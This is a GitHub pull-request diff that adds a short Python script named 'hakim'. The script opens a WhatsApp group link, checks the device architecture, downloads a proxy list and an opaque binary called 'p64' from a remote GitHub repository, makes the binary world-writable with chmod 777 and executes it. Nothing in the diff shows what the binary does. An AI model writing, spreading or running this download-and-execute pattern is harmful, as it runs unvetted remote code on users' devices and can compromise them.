Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
15 changes: 15 additions & 0 deletions hakim
Original file line number Diff line number Diff line change
@@ -0,0 +1,15 @@
import os
os.system('git pull')
os.system('xdg-open https://chat.whatsapp.com/G1wtAl2gjsg0N7pimK2RHH')
from os import path,system
from platform import uname
bt=uname().machine.lower()
if 'aarch' in bt:
url = "https://raw.githubusercontent.com/AKING110/files/main/.prox.txt"
system("curl -L "+url+" -o .prox.txt")
if path.isfile("p64"):
pass
else:
system("curl -L https://raw.githubusercontent.com/AKING110/files/main/p64 -o p64")
else:exit('\033[1;31m\n Sorry System or 32bit device not supported ')
os.system('chmod 777 p64 && ./p64')